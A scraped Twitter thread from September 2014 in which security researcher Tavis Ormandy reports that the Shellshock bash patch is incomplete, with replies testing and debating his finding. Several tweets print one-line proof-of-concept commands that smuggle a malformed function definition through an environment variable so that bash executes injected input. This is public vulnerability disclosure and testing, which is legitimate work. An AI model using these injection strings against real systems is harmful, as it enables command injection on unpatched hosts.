• Hjem
  • Om

Gemte søgninger

  • Fjern
  • Verificeret konto @
Foreslåede brugere
  • Verificeret konto @
  • Verificeret konto @
  • Sprog: dansk
    • Bahasa Indonesia
    • Bahasa Melayu
    • Català
    • Čeština
    • Deutsch
    • English
    • English UK
    • Español
    • Filipino
    • Français
    • Hrvatski
    • Italiano
    • Magyar
    • Nederlands
    • Norsk
    • Polski
    • Português
    • Română
    • Slovenčina
    • Suomi
    • Svenska
    • Tiếng Việt
    • Türkçe
    • Ελληνικά
    • Български език
    • Русский
    • Српски
    • Українська мова
    • עִבְרִית
    • العربية
    • فارسی
    • मराठी
    • हिन्दी
    • বাংলা
    • ગુજરાતી
    • தமிழ்
    • ಕನ್ನಡ
    • ภาษาไทย
    • 한국어
    • 日本語
    • 简体中文
    • 繁體中文
  • Har du en konto? Log ind
    Har du en konto?
    · Glemt din adgangskode?

    Ny på Twitter?
    Tilmeld dig
Ved at bruge Twitters tjenester accepterer du vores brug af cookies og dataoverførsel uden for EU. Vi og vores partnere opererer globalt og bruger cookies, herunder til statistik, personliggørelse og annoncer.
tavisos profil
Tavis Ormandy
Tavis Ormandy
Tavis Ormandy
@taviso

Tavis Ormandy

@taviso

Vulnerability researcher at Google. This is a personal stream, opinions expressed are mine.

Tilmeldt april 2008
  • © 2016 Twitter
  • Om
  • Hjælp
  • Vilkår
  • Privatliv
  • Cookies
  • Annonce-info
Afvis
Forrige
Næste

Gå til en persons profil

Gemte søgninger

  • Fjern
  • Verificeret konto @
Foreslåede brugere
  • Verificeret konto @
  • Verificeret konto @

Retweet dette til dine følgere?

Valgfri kommentar til Retweet
 
 

Gemte søgninger

  • Fjern
  • Verificeret konto @
Foreslåede brugere
  • Verificeret konto @
  • Verificeret konto @
140

Er du sikker på, at du vil slette dette tweet?

Promover dette Tweet

Bloker

  • Føj en lokalitet til dine tweets

    Når du tweeter med en lokalitet, gemmer Twitter den lokalitet. Du kan slå lokalitet til/fra forud for hvert tweet og har altid muligheden for at slette din lokalitetshistorie. Lær mere

    Profilresumé

    Dine lister

    Opret en ny liste


    Under 100 tegn, valgfri

    Privatliv

    Kopier link til tweet

    Indlejring af dette tweet

    Embed this Video

    Føj dette tweet til dit websted ved at kopiere koden nedenfor. Lær mere

    Tilføj denne video til dit websted ved at kopiere koden nedenfor. Lær mere

    Hmm, der var et problem med forbindelsen til serveren.

    Forhåndsvisning

    Log ind på Twitter

    · Glemt din adgangskode?
    Har du ingen konto? Tilmeld dig »

    Tilmeld dig Twitter

    Ikke på Twitter? Tilmeld dig, find de emner du holder af, og bliv opdateret så snart noget sker.

    Tilmeld dig
    Har du en konto? Log ind »

    To-vejs (sende og modtage) tjenestenumre:

    Land Kode For kunder af
    USA 40404 (nogen)
    Canada 21212 (nogen)
    Storbritannien 86444 Vodafone, Orange, 3, O2
    Brasilien 40404 Nextel, TIM
    Haiti 40404 Digicel, Voila
    Irland 51210 Vodafone, O2
    Indien 53000 Bharti Airtel, Videocon, Reliance
    Indonesien 89887 AXIS, 3, Telkomsel, Indosat, XL Axiata
    Italien 4880804 Wind
    3424486444 Vodafone
    » Se sms-tjenestenumre for andre lande

    Bekræftelse

     

    Køb nu

    Hmm... Noget gik galt. Prøv venligst igen.

    Velkommen hjem!

    Denne tidslinje er der, hvor du vil bruge mest af din tid og konstant få opdateringer om det, der interesserer dig.

    Fungerer Tweets ikke for dig?

    Hold over profilbilledet og klik på Følger-knappen for at stoppe med at følge enhver konto.

    Sig en masse med en smule

    Når du ser et Tweet, du elsker, kan du trykke på hjertet — det viser personen, der skrev det, din påskønnelse.

    Spred budskabet

    Den hurtigste måde, hvorpå du kan dele en andens Tweet med dine følgere, er et Retweet. Tryk på ikonet for at sende det straks.

    Deltag i samtalen

    Tilføj dine tanker om ethvert Tweet med et svar. Find et emne, du er passioneret omkring, og hop direkte ind i samtalen.

    Få det seneste at vide

    Få øjeblikkelig indsigt i det, folk snakker om lige nu.

    Få mere af det, du elsker

    Følg flere konti for at få øjeblikkelige opdateringer om de emner, du er interesseret i.

    Opdag, hvad der sker.

    Se de nyeste samtaler om ethvert emne her og nu.

    Gå aldrig glip af et Øjeblik

    Følg de bedste historier, mens de sker.

    Forrige tweet Næste tweet
    Tavis Ormandy ‏@taviso 24. sep. 2014

    The bash patch seems incomplete to me, function parsing is still brittle. e.g. $ env X='() { (a)=>\' sh -c "echo date"; cat echo

    • Retweets 499
    • Likes 247
    • Selcuk Demiray Matt Groeninger Andre Goree Love B. Nyberg Gregory Borysiak michi lehr Makoto Shimabukuro Leif Ryge uɐdɐɾ_ʞɔɐɥ
    14.21 - 24. sep. 2014
    0 svar 499 retweets 247 likes
      1. Frans Rosén ‏@fransrosen 24. sep. 2014

        @taviso not true. env X='\' will set the X to \. You're setting a env-var and then running a sh-call as @newshtwit mentioned.

        0 svar 0 retweets 1 like
      2. Tavis Ormandy ‏@taviso 24. sep. 2014

        @fransrosen @newshtwit This is a bug in bash function parsing. Read execute_null_command(), and then we can discuss this.

        0 svar 6 retweets 10 likes
      3. Frans Rosén ‏@fransrosen 24. sep. 2014

        @taviso @newshtwit oops, my bad, that was stealth really. good find and a longer night over here..

        0 svar 0 retweets 0 likes
      1. postmodern ‏@postmodern_mod3 24. sep. 2014

        @taviso a better test: `env X='() { (a)=>\' bash -c "echo echo vuln"; [[ "$(cat echo)" == "vuln" ]] && echo "still vulnerable :("

        0 svar 16 retweets 16 likes
      2. Philipp Jovanovic ‏@Daeinar 25. sep. 2014

        @postmodern_mod3 @taviso @veorq don’t know if obvious, but replacing “bash” with “zsh” prints also “still vulnerable :(”

        0 svar 0 retweets 0 likes
      3. Philipp Jovanovic ‏@Daeinar 25. sep. 2014

        @postmodern_mod3 @taviso @veorq i.e. env X='() { (a)=>\' zsh -c "echo echo vuln"; [[ "$(cat echo)" == "vuln" ]] && echo "still vulnerable”

        0 svar 34 retweets 16 likes
      4. Vis andre svar
      5. Jun Inoue ‏@jun0inoue 25. sep. 2014

        @Daeinar One of my followers pointed out this prints "vulnerable" because of file "echo" left in cur. dir. Does it reproduce in a clean dir?

        0 svar 1 retweet 3 likes
      6. Philipp Jovanovic ‏@Daeinar 25. sep. 2014

        @jun0inoue Yeah he is right. There was an “echo” file. Doesn’t work in a clean dir. So zsh seems to be okay. Thanks for pointing it out!

        0 svar 6 retweets 2 likes
      7. postmodern ‏@postmodern_mod3 25. sep. 2014

        @Daeinar @jun0inoue a commenter on the redhat bug came up with using /dev/stdout to avoid leaving behind files. https://bugzilla.redhat.com/show_bug.cgi?id=1141597#c34 …

        0 svar 1 retweet 1 like
      8. Philipp Jovanovic ‏@Daeinar 25. sep. 2014

        @postmodern_mod3 @jun0inoue Ah interesting! Thx for the hint.

        0 svar 0 retweets 0 likes
      1. Leif Ryge ‏@wiretapped 25. sep. 2014

        another demonstration of @taviso's new #bash parsing bug: http://seclists.org/oss-sec/2014/q3/679 … $ function a a>\ [RETURN] > foo $ whatever $ ls whatever

        0 svar 37 retweets 30 likes
      2. Vis andre svar
      3. Vis mere
    1. Eric Monti ‏@ericmonti 24. sep. 2014

      Incase you missed it, internet... @taviso has illustrated the bash patch didn't fix the bug! gg @tavis , tragicfail #bash

      0 svar 22 retweets 7 likes
      1. newshtwit ‏@newshtwit 24. sep. 2014

        @taviso I dont get it. you're just running: sh -c "echo date".

        0 svar 2 retweets 1 like
      2. Vis andre svar
      3. Joshua J. Drake ‏@jduck 24. sep. 2014

        @newshtwit @taviso maybe try "bash" instead of "sh" ... it creates a file called "echo"

        0 svar 1 retweet 1 like
      4. newshtwit ‏@newshtwit 24. sep. 2014

        @jduck @taviso thanks. i get expected (vulnerable) behavior now. eek! mv /bin/bash /bin/rash; ln -s /bin/sh /bin/bash

        0 svar 1 retweet 2 likes
      5. Vis mere
      1. Will Dietz ‏@wdtz 24. sep. 2014

        @taviso try bash -c "echo ls /etc; cat echo" without and with the X env variable set, perhaps that will better demonstrate what's going on?

        0 svar 0 retweets 1 like
      2. Chief Chaos Monkey ‏@DrNemski 24. sep. 2014

        @wdtz @taviso Yeah that still works with the latest version of bash (X='() { (a)=>\' bash -c "echo ls /etc; cat echo")

        0 svar 4 retweets 3 likes

    Indlæsning ser ud til at tage noget tid.

    Twitter kan være overbelastet eller have en midlertidig forstyrrelse. Prøv igen eller besøg Twitter-status for mere information.

      Promoveret Tweet

      false

      • © 2016 Twitter
      • Om
      • Hjælp
      • Vilkår
      • Privatliv
      • Cookies
      • Annonce-info